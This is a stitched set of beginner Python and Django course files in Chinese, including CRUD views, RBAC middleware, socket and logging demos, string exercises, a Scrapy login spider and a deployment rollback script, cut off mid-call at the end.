'menu_edit.html', {"form": form}) def menu_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Menu.objects.filter(id=nid).delete() return redirect('menu_list') <file_sep>/day18/练习/static/a.js 
alert('这是publisher_list引用的js');<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/views/home.py from django.shortcuts import render, redirect from web import models from web.forms import UserForm from web.modelform import OrderModelForm def add_user(request): form_obj = UserForm() username = request.POST.get("name") # print(username) if request.method == "POST": form_obj = UserForm(request.POST) if form_obj.is_valid(): # 校验数据有效性 old_name = models.User.objects.filter(name=username) if old_name: data = "用户名已经存在" return render(request, "add_user.html", locals()) else: models.User.objects.create(**form_obj.cleaned_data) return redirect("/web/user/") return render(request, "add_user.html", locals()) def del_user(request, pk): models.User.objects.filter(id=pk).delete() return redirect("/web/user/") def edit_user(request, pk): username = request.POST.get("name") user_obj = models.User.objects.filter(id=pk).first() from django.forms import model_to_dict user_dict = model_to_dict(user_obj) form_obj = UserForm(user_dict) if request.method == "POST": form_obj = UserForm(request.POST) if form_obj.is_valid(): old_name = models.User.objects.filter(name=username) if old_name: data = "用户名已经存在" return render(request, "edit_user.html", locals()) user_obj.name = form_obj.cleaned_data.get("name") user_obj.save() return redirect("/web/user/") return render(request, "edit_user.html", locals()) def info(requst): return render(requst, "user_info.html") def userlist(request): data = models.User.objects.all return render(request, 'userlist.html', {'user_list': data}) # from django.forms import ModelForm # # # class OrderModelForm(ModelForm): # class Meta: # model = models.Order # fields = "__all__" def add_order(request): if request.method == "GET": form = OrderModelForm() else: form = OrderModelForm(request.POST) if form.is_valid(): form.save() return redirect("/web/orderlist") return render(request, 'add_order.html', {'form': form}) def orderlist(request): data = models.Order.objects.all return 
render(request, 'orderlist.html', {'order_list': data}) def orderinfo(requst): return render(requst, "orderinfo.html") def edit_order(request, pk): obj = models.Order.objects.filter(id=pk).first() print(obj) if request.method == "GET": form = OrderModelForm(instance=obj) return render(request, 'edit_order.html', {"form": form}) else: form = OrderModelForm(instance=obj, data=request.POST) if form.is_valid(): form.save() return redirect("/web/orderlist/") return render(request, "edit_order.html", {"form": form}) def del_order(request, uid): models.Order.objects.filter(id=uid).delete() return redirect("/web/orderlist/") <file_sep>/day8/glance/api/__init__.py from . import policy<file_sep>/day9/进程/信号量.py from multiprocessing import Process,Semaphore import time,random def go_ktv(sem,user): sem.acquire() print('%s占到一件ktv小屋' %user) time.sleep(random.randint(3,5)) sem.release() print('%s走出小屋'%user) if __name__ == '__main__': sem=Semaphore(4) p_l=[] for i in range(13): p=Process(target=go_ktv,args=(sem,'user%s' %i,)) p.start() p_l.append(p) for i in p_l: i.join() print('##########') <file_sep>/day5/三级菜单.py menu = { '北京': { '海淀': { '五道口': { 'soho': {}, '网易': {}, 'google': {} }, '中关村': { '爱奇艺': {}, '汽车之家': {}, 'youku': {}, }, '上地': { '百度': {}, }, }, '昌平': { '沙河': { '老男孩': {}, '北航': {}, }, '天通苑': {}, '回龙观': {}, }, '朝阳': {}, '东城': {}, }, '上海': { '闵行': { "人民广场": { '炸鸡店': {} } }, '闸北': { '火车战': { '携程': {} } }, '浦东': {}, }, '山东': {}, } ##堆栈 # l = [menu] # # # print(l[-1]) # while l: # for key in l[-1]:print(key) # k = input('input>>').strip() # if k in l[-1].keys() and l[-1] [k]:l.append((l[-1][k])) # # elif k == 'b':l.pop() # elif k == 'q':break ##递归 # def func(dic): # while 1: # for key in dic: # print(key) # key = input('input>>').strip() # if key in dic.keys() and dic[key]: # ret = func(dic[key]) # #print(ret) # if ret =='q':break # elif key =='b' or key == 'q': # #print(key) # return key # func(menu) def threeLM(dic): while True: for k in dic:print(k) key = 
input('input>>').strip() if key == 'b':return if key == 'q':return 'q' elif key in dic.keys() and dic[key]: ret = threeLM(dic[key]) if ret == 'q': return 'q' threeLM(menu) <file_sep>/day16/mysite/app01/models.py from django.db import models # Create your models here. # 所有和数据库ORM相关的类都在这个文件定义,并且只能在这个文件定义 # 定义一个 出版社 类 class Publisher(models.Model): id = models.AutoField(primary_key=True) name = models.CharField(max_length=32) def __str__(self): return self.name <file_sep>/day3/file文件操作.py # # with open('log1',encoding='utf-8',mode='r') as f1: # print(f1.read()) # f1.close() # f1 = open('log1',encoding='utf-8',mode='r+') # f1.seek(0,2) ##把光标调整到最后,然后再去写,原来的内容不会被覆盖 # f1.write('aaaaaaaaaaaa') # f1.seek(0) ##然后把光标调整到最前面,再去读 # print(f1.read()) # f1.close() # f1 = open('log1',encoding='utf-8',mode='w') # f1.write('我们都是好孩子') # f1.close() # f1 = open('log1',mode='wb') ##默认是bytes类型,然后转换成utf-8写入到log1文件中 # f1.write('我们都是好孩子'.encode('utf-8')) # f1.close() ##追加 a # f1 = open('log1',encoding='utf-8',mode='a') # f1.write('ddddddddddd') # f1.close() #可写可读a+ # f1 = open('log1',encoding='utf-8',mode='a+') # f1.write('999999') # f1.seek(0) # print(f1.read()) # f1.close() ##文件的改 # import os # with open('log1',encoding='utf-8') as f1,\ # open('log1.bak',encoding='utf-8',mode='w') as f2: # for line in f1: # new_line = line.replace('99','dd') # f2.write(new_line) ##把替换完成的内容,写到f2里面 # # os.remove('log1') # os.rename('log1.bak','log1') #read(n) # f1 = open('log1',encoding='utf-8') # print(f1.read(5)) # f1.close() # # f2 = open('log1',mode='rb') # print(f2.read(6).decode('utf-8')) # f2.close() #readlines f1 = open('log1',encoding='utf-8',) print(f1.readlines()) f1.close() f2 = open('log1',encoding='utf-8',mode='w') f2.write("aaaaaaaaaaaaa") print(f2.tell()) f2.close() <file_sep>/day7/hnf.py import logging def mylog(): global sh logger = logging.getLogger() # 先创造一个格式 formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = 
logging.FileHandler('log.log',encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) sh = logging.StreamHandler() #sh是在屏幕上面显示的 # sh.setFormatter(formatter1) logger.addHandler(sh) fh.setLevel(logging.ERROR) #文件里面显示error级别以上的 sh.setLevel(logging.DEBUG) #屏幕上面显示debug级别以上的 return logger mylog() def func(): print('ok') name=input('name:') pwd=input('pwd:') if name =='hu' and pwd =='123': #ret=mylog() sh.setLevel(logging.info('登录成功')) print('登录成功') func() else: print('登录失败') <file_sep>/day27/s21crm/crm/forms/user.py from django import forms from crm import models from crm.pwd.md5 import md5 # import md5 class UserInfoModelForm(forms.ModelForm): class Meta: model = models.UserInfo # 这里前面的model一定不要写models fields = '__all__' def __init__(self, *args, **kwargs): # 在父类的初始化方法中将7个字段当成字典放到了 self.fields 中。 super(UserInfoModelForm, self).__init__(*args, **kwargs) for key, field in self.fields.items(): field.widget.attrs['class'] = 'form-control' def clean_password(self): """ 密码对应的钩子方法 :return: """ user_input_pwd = self.cleaned_data['password'] return md5(user_input_pwd) <file_sep>/day2/练习.py #字符串 ''' name = "aleX leNb" #8) 将name变量对应的值中的第一个’l’替换成’p’,并输出结果 # print (name[1]) a = name.replace('l','p',1) print (a) #9) 将 name 变量对应的值根据 所有的“l” 分割,并输出结果。 b = name.split('l') print (b) #11) 将 name 变量对应的值变大写,并输出结果 c = name.upper() print (c) #12) 将 name 变量对应的值变小写,并输出结果 d = name.lower() print (d) #13) 将name变量对应的值首字母’a’大写,并输出结果 e = name.capitalize() print (e) #14) 判断name变量对应的值字母’l’出现几次,并输出结果 f = name.count('l') print (f) #15) 如果判断name变量对应的值前四位’l’出现几次,并输出结果 # g = name.count('l','0','4') # # print (g) #16) 从name变量对应的值中找到’N’对应的索引(如果找不到则报错),并输出结果 j = name.index('N') print (j) #17) 从name变量对应的值中找到’N’对应的索引(如果找不到则返回-1)输出结果 j1 = name.find('N') print (j1) #18) 从name变量对应的值中找到’X le’对应的索引,并输出结果 # h = name.find('X', 'le') # print (h) #19) 请输出 name 变量对应的值的第 2 个字符? h1 = name[1] print (h1) #20) 请输出 name 变量对应的值的前 3 个字符? 
h2 = name[:3] print (h2) #21) 请输出 name 变量对应的值的后 2 个字符? h3 = name[-2:] print (h3) #22) 请输出 name 变量对应的值中 “e” 所在索引位置? h4 = name.find('e') print (h4) ''' ''' s = '123a4b5c' #1)通过对li列表的切片形成新的字符串s1,s1 = ‘123’ s1 = s[0:3] print (s1) #2)通过对li列表的切片形成新的字符串s2,s2 = ‘a4b’ s2 = s[3:6] print (s2) #3)通过对li列表的切片形成新的字符串s3,s3 = ‘1345’ s3 = s[0:-1:2] print (s3) #4)通过对li列表的切片形成字符串s4,s4 = ‘2ab’ s4 = s[1:-2:2] print (s4) #5)通过对li列表的切片形成字符串s5,s5 = ‘c’ s5 = s[-1] print (s5) #6)通过对li列表的切片形成字符串s6,s6 = ‘ba2’ s6 = s[-3:0:-2] print (s6) #使用while和for循环分别打印字符串s=’asdfer’中每个元素。 b='asdfer' ''' ##列表 ''' li = ['alex','wusir','eric','rain','alex'] #1)计算列表的长度并输出 print(len(li)) #2)列表中追加元素’seven’,并输出添加后的列表 li.append('seven') print (li) #3)请在列表的第1个位置插入元素’Tony’,并输出添加后的列表 li.insert(0,'Tony') print (li) #4)请修改列表第2个位置的元素为’Kelly’,并输出修改后的列表 li[1] = 'kelly' print (li) #5)请将列表l2=[1,’a’,3,4,’heart’]的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 l2=[1,'a',3,4,'heart'] li.append(l2) print (li) #6)请将字符串s = ‘qwert’的每一个元素添加到列表li中,一行代码实现,不允许循环添加。 s = 'qwert' li.extend(s) print (li) #7)请删除列表中的元素’eric’,并输出添加后的列表 li.remove('eric') print (li) #8)请删除列表中的第2个元素,并输出删除的元素和删除元素后的列表 a1 = li.pop(1) print (a1) print (li) #9)请删除列表中的第2至4个元素,并输出删除元素后的列表 del li[1:3] print (li) #10)请将列表所有得元素反转,并输出反转后的列表 li.reverse() print (li) #11)请计算出‘alex’元素在列表li中出现的次数,并输出该次数。 b = li.count('alex') print (b) ''' ''' #2,写代码,有如下列表,利用切片实现每一个功能 li = [1,3,2,'a','4','b','5','c'] c = li[-3:-1] print (c) #1)通过对li列表的切片形成新的列表l1,l1 = [1,3,2] l1 = li[:3] print (l1) #2)通过对li列表的切片形成新的列表l2,l2 = [’a’,4,’b’] l2 = li[3:6] print (l2) #3)通过对li列表的切片形成新的列表l3,l3 = [’1,2,4,5] l3 = li[:-1:2] print (l3) #4)通过对li列表的切片形成新的列表l4,l4 = [3,’a’,’b’] l4 = li[1:-2:2] print (l4) #5)通过对li列表的切片形成新的列表l5,l5 = [‘c’] l5 = li[-1:-3:-2] print (l5) #6)通过对li列表的切片形成新的列表l6,l6 = [‘b’,’a’,3] l6 = li[-3:0:-2] print (l6) ''' #利用下划线将列表的每一个元素拼接成字符串"alex_eric_rain" li = ['alex',' eric','wusir'] sa = '_'.join(li) print (sa) # for i in li: # # i.strip() # print (i.strip()) # i.startswith() ''' 
#6开发敏感词语过滤程序,提示用户输入评论内容,如果用户输入的内容中包含特殊的字符: li = ["苍老师","东京热",'武藤兰','波多野结衣'] new_list=[] m = input("请输入评论内容:").strip() for i in li: if m == i: m=m.replace(i,'...') new_list.append(m) else: new_list.append(m) print (new_list) ''' #5,查找列表li中的元素,移除每个元素的空格, # 并找出以’A’或者’a’开头,并以’c’结尾的所有元素,并添加到一个新列表中,最后循环打印这个新列表。 # li = ['alex', ' aric', ' rain'] # new_list=[] # for i in li: # m=i.strip() # print (m) # if m.startswith('a') or m.startswith('A'): # if m.endswith('c'): # new_list.append(m) # print (new_list) #有如下列表li = [1,3,4’,alex’,[3,7,8,’taibai’],5,’ritian’] #循环打印列表中的每个元素,遇到列表则再循环打印出它里面的元素。 #我想要的结果是(用两种方法实现,其中一种用range做): li = [1,3,4,'alex',[3,7,8,'taibai'],5,'ritian'] # for i in li: # if type(i) == type([]): # print (i) # # # else: # for a in i: # print (a) li = [1, 3, 4, 'alex', [3, 7, 8, 'taibai'], 5, 'ritian'] for i in li: if type(i) == type([]): for ii in i: print(ii) else: print(i) #3,写代码,有如下列表,按照要求实现每一个功能。 <file_sep>/day24/auto - 9 - 任务:构建权限和菜单的数据结构/auto - 9 - 任务:构建权限和菜单的数据结构/app01/views.py from django.shortcuts import render def login(request): """ 用户登录 :param request: :return: """ """ 用户登录:马帅,UserInfo表中做查询,登录成功后获取两部分数据: 权限 = { "user": {"url":'/app01/user/'}, "user_add": {"url":'/app01/user/add/'}, "user_edit": {"url":'/app01/user/edit/(\d+)'}, "order": {"url":'/app01/order/'}, } 菜单信息 = { 1:{ 'title':'用户管理', 'icon':'fa-clipboard', 'children':[ {'title':'用户列表','url':'/app01/user/'}, ] }, 2:{ 'title':'商品管理', 'icon':'fa-clipboard', 'children':[ {'title':'订单列表','url':'/app01/order/'}, ] } } """ <file_sep>/day16/04 动态页面.py import socket sk = socket.socket() sk.bind(('127.0.0.1', 8080)) sk.listen() # 定义一个专门用来处理访问index的函数 def index(): with open('index.html', 'r', encoding='utf8') as f: data = f.read() import time now = str(time.time()) data_s = data.replace('@@XX@@', now) return bytes(data_s, encoding='utf8') def home(): return b'home' # 定义一个访问路径和将要执行的函数的对应关系 url_func = [ ('/index/', index), ('/home/', home), ] while 1: conn, addr = sk.accept() # 接收消息 data = 
conn.recv(8000) # print(data) # 把字节类型的数据转换成字符串 data_str = str(data, encoding="utf8") # 将收到的消息按照\r\n分割,得到第一行 first_line = data_str.split("\r\n")[0] # 对第一行按照空格分 url = first_line.split()[1] print(url) # 根据用户访问的路径返回不同的内容 for i in url_func: if i[0] == url: func = i[1] break else: func = None if func: msg = func() else: msg = b'404 not found!' # 回复消息 # 按照约定好的格式回复消息 conn.send(b'http/1.1 200 ok\r\n\r\n') conn.send(msg) conn.close() <file_sep>/day8/粘包/client.py import socket ip_port=('127.0.0.1',8080) sk=socket.socket() res=sk.connect(ip_port) sk.send('hello'.encode('utf-8')) sk.send('egg'.encode('utf-8')) sk.close() <file_sep>/day21/CMS/templates/index.html {% extends "base.html" %} {% block page-css %} <link rel="stylesheet" href="/static/plugins/bootstrap-3.3.7/css/bootstrap.min.css"> <link rel="stylesheet" href="/static/css/index.css"> {% endblock %} {% block page-left %} <div class="panel panel-info"> <div class="panel-heading">业务线分类</div> <div class="panel-body"> {% for lob in lob_list %} {# <p><a href="">{{ lob.title }}({{ lob.faultreport_set.count }})</a></p>#} <p><a href="/fault-report/lob/{{ lob.title }}/">{{ lob.title }}({{ lob.num }})</a></p> {% endfor %} </div> </div> <div class="panel panel-success"> <div class="panel-heading">标签分类</div> <div class="panel-body"> {% for tag in tag_list %} <p><a href="/fault-report/tag/{{ tag.title }}/">{{ tag.title }}({{ tag.num }})</a></p> {% endfor %} </div> </div> <div class="panel panel-warning"> <div class="panel-heading">日期归档</div> <div class="panel-body"> {% for archive in archive_list %} <p><a href="/fault-report/archive/{{ archive.ym }}/">{{ archive.ym }}({{ archive.num }})</a></p> {% endfor %} </div> </div> {% endblock %} {% block page-right %} <div class="report-list"> {% for report in report_list %} <div class="report"> <div class="report-title"> {# title#} <h3><a href="/fault-report/report/{{ report.id }}">{{ report.title }}</a></h3> </div> <div class="report-desc"> {# //简介#} <p>{{ report.desc }}</p> </div> <div 
class="report-info"> <span>{{ report.user.username }}发布于</span> <span>{{ report.create_time }}</span> <span class="glyphicon glyphicon-comment" aria-hidden="true">评论({{ report.comment_count }})</span> <span class="glyphicon glyphicon-thumbs-up" aria-hidden="true">支持({{ report.up_count }})</span> <hr style="height: 1px;background-color: black; "> </div> </div> {% endfor %} {{ page_html|safe }} </div> {% endblock %}<file_sep>/day27/s21crm/crm/forms/course.py from django import forms from crm import models class CourseModelForm(forms.ModelForm): class Meta: model = models.Course # 这里前面的model一定不要写models fields = '__all__' error_messages = { 'name': {'required': '课程不能为空'} } widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}) } <file_sep>/day17/s21/app01/models.py from django.db import models # Create your models here. #创建用户库 class User(models.Model): id = models.AutoField(primary_key=True) username=models.CharField(max_length=32,unique=True) password=models.CharField(max_length=32) def __str__(self): return self.username # 创建业务表 class Service(models.Model): id = models.AutoField(primary_key=True) name=models.CharField(max_length=32,unique=True) # 创建主机表 class Host(models.Model): id = models.AutoField(primary_key=True) hostname = models.CharField(max_length=32) pwd=models.CharField(max_length=32) service=models.ForeignKey(to="Service",on_delete=models.CASCADE) <file_sep>/day7/mylog.py # logging # 日志 # 程序出错 -- 日志 对内看的 # 给用户看的 对外看的 import logging # 简单配置 # logging.basicConfig(level=logging.DEBUG, # format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', # datefmt='%a, %d %b %Y %H:%M:%S', # filename='test.log', # filemode='w' # ) # logging.debug('debug message') # 非常细节的日志 —— 排查错误的时候使用 # logging.info('info message') # 正常的日志信息 # logging.warning('warning message') # 警告 # logging.error('error message') # 错误 # logging.critical('critical message') # 严重错误 # logger对象的方式配置 # 吸星大法 def mylog(): logger = logging.getLogger() # 先创造一个格式 formatter = 
logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = logging.FileHandler('log.log',encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) sh = logging.StreamHandler() #sh是在屏幕上面显示的 # sh.setFormatter(formatter1) logger.addHandler(sh) fh.setLevel(logging.ERROR) #文件里面显示error级别以上的 sh.setLevel(logging.DEBUG) #屏幕上面显示debug级别以上的 return logger # logger.debug('logger debug message') # logger.info('logger info message') # logger.warning('logger warning message') # logger.error('程序出错了') # logger.critical('logger critical message') mylog()<file_sep>/day18/练习/批量向数据库插入数据.py import os import django if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "练习.settings") django.setup() from app01 import models # 创建500个书籍对象 book_list=[models.Book(title="贝多芬第{}交响曲".format(i),publisher_id=i) for i in range (500)] # 批量提交到数据库 models.Book.objects.bulk_create(book_list) #批量添加出版社 # publisher_list = [models.Publisher(name="沙河第{}出版社".format(i)) for i in range(502)] # models.Publisher.objects.bulk_create(publisher_list, batch_size=30)<file_sep>/day27/s21crm/rbac/views/permission.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.permission import PermissionModelForm from django.urls import reverse def permission_list(request): """ 部门列表 :param request :return: """ queryset = models.Permission.objects.all() return render(request, 'permission_list.html', {'queryset': queryset}) def permission_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = PermissionModelForm() return render(request, 'permission_add.html', {'form': form}) form = PermissionModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('permission_list') else: return render(request, 'permission_add.html', {'form': form}) def permission_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = 
models.Permission.objects.filter(id=nid).first() if request.method == "GET": form = PermissionModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'permission_edit.html', {"form": form}) form = PermissionModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('permission_list') else: return render(request, 'permission_edit.html', {"form": form}) def permission_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Permission.objects.filter(id=nid).delete() return redirect('permission_list') <file_sep>/day24/auto - 12 - 权限粒度控制到按钮/相关脚本/1.获取权限信息.py permission_menu_list = [ { 'permissions__title': '用户列表', 'permissions__url': '/app01/user/', 'permissions__name': 'user_list', 'permissions__menu_id': 1, 'permissions__menu__title': '用户管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None }, { 'permissions__title': '添加用户', 'permissions__url': '/app01/user/add/', 'permissions__name': 'user_add', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '编辑用户', 'permissions__url': '/app01/user/edit/(\\d+)', 'permissions__name': 'user_edit', 'permissions__menu_id': None, 'permissions__menu__title': None, 'permissions__menu__icon': None, 'permissions__parent_id': 1, 'permissions__parent__name': 'user_list' }, { 'permissions__title': '订单列表', 'permissions__url': '/app01/order/', 'permissions__name': 'order', 'permissions__menu_id': 2, 'permissions__menu__title': '商品管理', 'permissions__menu__icon': 'fa-clipboard', 'permissions__parent_id': None, 'permissions__parent__name': None } ] """ permission_dict = { "user_list": {"url":'/app01/user/'}, "user_add": {"url":'/app01/user/add/'}, "user_edit": {"url":'/app01/user/edit/(\d+)'}, "order": {"url":'/app01/order/'}, } """ permission_dict = {} for 
item in permission_menu_list: name = item['permissions__name'] url = item['permissions__url'] menu_id = item['permissions__menu_id'] parent_name = item['permissions__parent__name'] permission_dict[name] = {'url': url,'menu_id':menu_id,'parent_name':parent_name} print(permission_dict) <file_sep>/deploy/rbac/middlewares/rbac.py import re from django.utils.deprecation import MiddlewareMixin from django.conf import settings from django.shortcuts import HttpResponse, redirect from web import models class RBACMiddleware(MiddlewareMixin): """ 用户权限校验的中间件 """ def process_request(self, request): """ 用户认证 1. 当前请求的URL 2. 去Session中获取当前用户拥有的所有的权限 3. 权限校验 :param request: :return: """ current_url = request.path_info # 当前浏览器请求的url # 1. 白名单处理 for valid in settings.VALID_LIST: if re.match(valid, current_url): return None user_id = request.session.get('user_id') if not user_id: return redirect('/login/') user_object = models.UserInfo.objects.filter(id=user_id).first() # 获取当前登录用户的对象 request.user=user_object <file_sep>/day6/6.继承.py # 为什么会有继承? 
解决代码的冗余问题 # class Person: # def __init__(self,name,hp,dps,sex): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # class Parent:pass # class Son(Parent):pass # 单继承 # Son类 继承 Parent类 # 父类 基类 超类 —— Parent类 # 子类 派生类 —— Son类 # 多继承 # class Parent1:pass # class Parent2:pass # # class Son(Parent1,Parent2):pass # class Animal: # def __init__(self, name, hp, dps): # self.name = name # self.hp = hp # self.dps = dps # def eat(self): # print('%s吃药回血了'%self.name) # class Person(Animal): # def __init__(self, name, hp, dps,sex): # super().__init__(name,hp,dps) # Animal.__init__(self,name,hp,dps) # self.sex = sex # 派生属性 # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog(Animal): # def __init__(self,name,hp,dps,kind): # super().__init__(name, hp, dps) # Animal.__init__(self, name, hp, dps) # self.kind = kind # 派生属性 # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # alex = Person('alex',250,5,'N/A') # ha2 = Dog('哈士奇',15000,200,'藏獒') # print(alex.__dict__) # print(ha2.__dict__) # ha2.eat() # alex.eat() # ha2.bite(alex) # alex.attack(ha2) # 对象的内存空间 - 创建这个对象的类的内存空间 - 父类的 # class Foo: # def __init__(self): # self.func() # def func(self): # print('in Foo') # # class Son(Foo): # def func(self): # print('in Son') # Son() <file_sep>/day19/homework/s21/app01/loging.py import logging # from conf import setting def mylog(): logger = logging.getLogger() # 吸星大法 # 先创造一个格式 formatter = 
logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # 往文件中输入 fh = logging.FileHandler('./logs/info.log', encoding='utf-8') # 创造了一个能操作文件的对象fh fh.setFormatter(formatter) # 高可定制化 logger.addHandler(fh) logger.setLevel(logging.DEBUG) # fh.setLevel(logging.INFO) # 文件里面显示error级别以上的 return logger<file_sep>/day19/modelform/app01/views.py from django.shortcuts import render, redirect from app01 import models from app01.forms import BookModelForm from django.contrib.auth.decorators import login_required # auth自带的装饰器 from django import views # Create your views here. def book_list(request): data = models.Book.objects.all() return render(request, "book_list.html", {"data": data}) @login_required def add_book(request): form_obj = BookModelForm() if request.method == "POST": form_obj = BookModelForm(request.POST) if form_obj.is_valid(): form_obj.save() return redirect("/book_list/") return render(request, "add_book.html", locals()) def edit_book(request, pk): book_obj = models.Book.objects.filter(id=pk).first() print("我是book_obj", book_obj) # instance实例 form_obj = BookModelForm(instance=book_obj) # 实例化的form_obj if request.method == "POST": # 获取用户提交过来的数据,用request.POST传过来的数据去更新book_obj这本书 form_obj = BookModelForm(request.POST, instance=book_obj) if form_obj.is_valid(): form_obj.save() return redirect("/book_list/") return render(request, "edit_book.html", locals()) from django.contrib import auth # 登录 def login(request): if request.method == "GET": return render(request, "login.html") else: next_url = request.GET.get("next") print(next_url) username = request.POST.get("username") pwd = request.POST.get("password") user_obj = auth.authenticate(request, username=username, password=pwd) if user_obj: auth.login(request, user_obj) # # 给该次请求设置了session数据,并在响应中回写cookie if next_url: return redirect(next_url) else: return redirect("/book_list/") else: return render(request, "login.html", {"error_msg": "用户名或密码错误"}) from django.contrib.auth.models import User # 创建用户auth自带 
def reg(request): if request.method == "GET": return render(request, "reg.html") else: username = request.POST.get("username") pwd = request.POST.get("password") user_obj = User.objects.create_user(username=username, password=pwd) # 用auth自带的去创建用户 return redirect("/login/") # class RegView(views.View): # def get(self, request): # return render(request, "reg.html") # # def post(self, request): # username = request.POST.get("username") # pwd = request.POST.get("<PASSWORD>") # # 去数据库中创建用户 # # User.objects.create() --> 直接在数据库创建用户,密码是存的明文的 # user_obj = User.objects.create_user(username=username, password=pwd) # # User.objects.create_superuser() # 创建的超级用户 # return redirect("/login/")<file_sep>/day8/client.py import socket # sk=socket.socket() # #while True: # sk.connect(('127.0.0.1',9100)) # while True: # ret=(sk.recv(1024).decode('utf-8')) # if ret == 'q': break # print(ret) # inp=input('请输入你要发送的消息:') # sk.send(inp.encode('utf-8')) # if inp == 'q': break # # sk.close() <file_sep>/day2/04 集合.py set1 = {1,'alex',False,(1,2,3)} #集合外面是大括号,但是没有冒号,字典也是大括号,有冒号 #元组是()括号,列表是[] #增 # set1.add('bb') # print (set1) # #删除 # set1.pop() ##括号里面不用写东西,是随机删除一个元素的 # print (set1) # # set1.clear() ##清空列表 # print (set1) # del set1 ##删除集合 # print (set1) set3 = {1,2,3,4,5} set2 = {4,5,6,7,8} #交集 & print (set3 & set2) #并集 | union print (set3 | set2) #差集 - difference print (set3 - set2) print (set2 - set3) #反交集 ^ symmetric_difference 就是打印双方都没有的元素 print (set2 ^ set3) set4 = {1,2,3} set5 = {1,2,3,4,5,6} print (set4 < set5) ##返会true 说明set1是set2子集。 print(set4.issubset(set5)) print(set5 > set4) #frozenset 返回一个冻结的集合,冻结后集合不能再添加或删除任何元素。 s = frozenset('barry') s1 = frozenset({4,5,6,7,8}) print(s,type(s)) print(s1,type(s1)) <file_sep>/day20/CMS/static/js/change.js $(".login-box input").focus(function () { $(".error_old").text(""); $(".error_new").text("") } ); <file_sep>/day26/scrapy框架/login/login/spiders/loginpost.py # -*- coding: utf-8 -*- import scrapy class LoginpostSpider(scrapy.Spider): name = 
'loginpost' # allowed_domains = ['www.xx.com'] start_urls = ['https://accounts.douban.com/login'] def start_requests(self): data = { 'source': 'movie', 'redir': 'https://movie.douban.com/', 'form_email': '15027900535', 'form_password': '<PASSWORD>', 'login': '登录', } for url in self.start_urls: # 登录页面 yield scrapy.FormRequest(url=url,callback=self.parse,formdata=data) # FormRequest发送的是post请求 def getPageText(self, response): # 这个是用来解析个人主页的数据的 page_text = response.text with open('./douban.html', 'w', encoding='utf-8') as fp: fp.write(page_text) print('over') def parse(self, response): # 对当前用户的个人主页页面进行获取 url = 'https://www.douban.com/people/185687620/' yield scrapy.Request(url=url, callback=self.getPageText) <file_sep>/deploy/script/rollback_script.py #!/usr/bin/env python # -*- coding:utf-8 -*- """ 1. 停掉原来的服务 2. 删除软连接 3. 重新做新版本的软连接 4. 启动新的程序 """ import os import sys import shutil from subprocess import check_output, check_call, CalledProcessError from zipfile import ZipFile CODE_BASE_PATH = "/home/yx/codes/" WEB_BASE_PATH = "/home/yx/server/" def kill_origin_process(match_key): """ 停掉原来的服务 :param name: :return: """ check_command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' " % (match_key) check_status = check_output(check_command, shell=True) if check_status: command = "ps -ef |grep '%s' | grep -v grep | awk '{print $2}' | xargs kill -9" % (match_key) check_call(command, shell=True) def link(project_name, version, file_name): """ 软链接 :return: """ web_file_path = os.path.join(CODE_BASE_PATH, project_name, version, file_name.split('.')[0]) # 代码所在的路径 link_path = os.path.join(WEB_BASE_PATH, project_name) # 代码所运行的目录 if os.path.exists(link_path): os.remove(link_path) # 移除原来的软连接 os.symlink(web_file_path, link_path) # 重新做软连接 return link_path def start_service(project_name, start_command): """ 启动服务 :return: """ command = "%s >/dev/null 2>&1 & " % (start_command,) web_file_path = os.path.join(WEB_BASE_PATH, project_name) # 启动 check_call(command, shell=True, 
